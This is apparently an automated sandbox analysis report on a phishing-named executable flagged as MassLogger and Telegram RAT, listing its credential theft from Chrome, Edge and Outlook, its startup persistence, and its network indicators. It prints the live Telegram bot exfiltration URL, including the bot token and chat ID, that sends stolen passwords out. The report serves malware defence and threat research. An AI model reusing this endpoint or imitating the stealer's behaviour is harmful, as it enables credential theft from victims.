Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01004E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_01004E87

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01011E06 GetUserNameW,

0_2_01011E06

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01003F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_01003F3A

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD49A0

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4424, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: nonplacental.exe	Binary or memory string: WIN_81
Source: nonplacental.exe	Binary or memory string: WIN_XP
Source: nonplacental.exe	Binary or memory string: WIN_XPe
Source: nonplacental.exe	Binary or memory string: WIN_VISTA
Source: nonplacental.exe	Binary or memory string: WIN_7
Source: nonplacental.exe	Binary or memory string: WIN_8
Source: nonplacental.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4424, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4424, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4424, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01046283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_01046283
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01046747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_01046747
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_002F6283
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_002F6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	12 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	121 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION REQUEST - BQS058.exe	29%	ReversingLabs	Win32.Trojan.AutoitInject
QUOTATION REQUEST - BQS058.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Allene\nonplacental.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Allene\nonplacental.exe	29%	ReversingLabs	Win32.Trojan.AutoitInject

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.3338328536.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D02000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.3338328536.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.3338328536.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267	RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576113
Start date and time:	2024-12-16 14:59:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION REQUEST - BQS058.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 57 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: QUOTATION REQUEST - BQS058.exe

Simulations

Behavior and APIs

Time	Type	Description
09:00:22	API Interceptor	2362963x Sleep call for process: RegSvcs.exe modified
15:00:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse
104.21.67.152	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse
193.122.6.168	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	New_Order_List.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	132.226.8.169
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
reallyfreegeoip.org	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
api.telegram.org	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
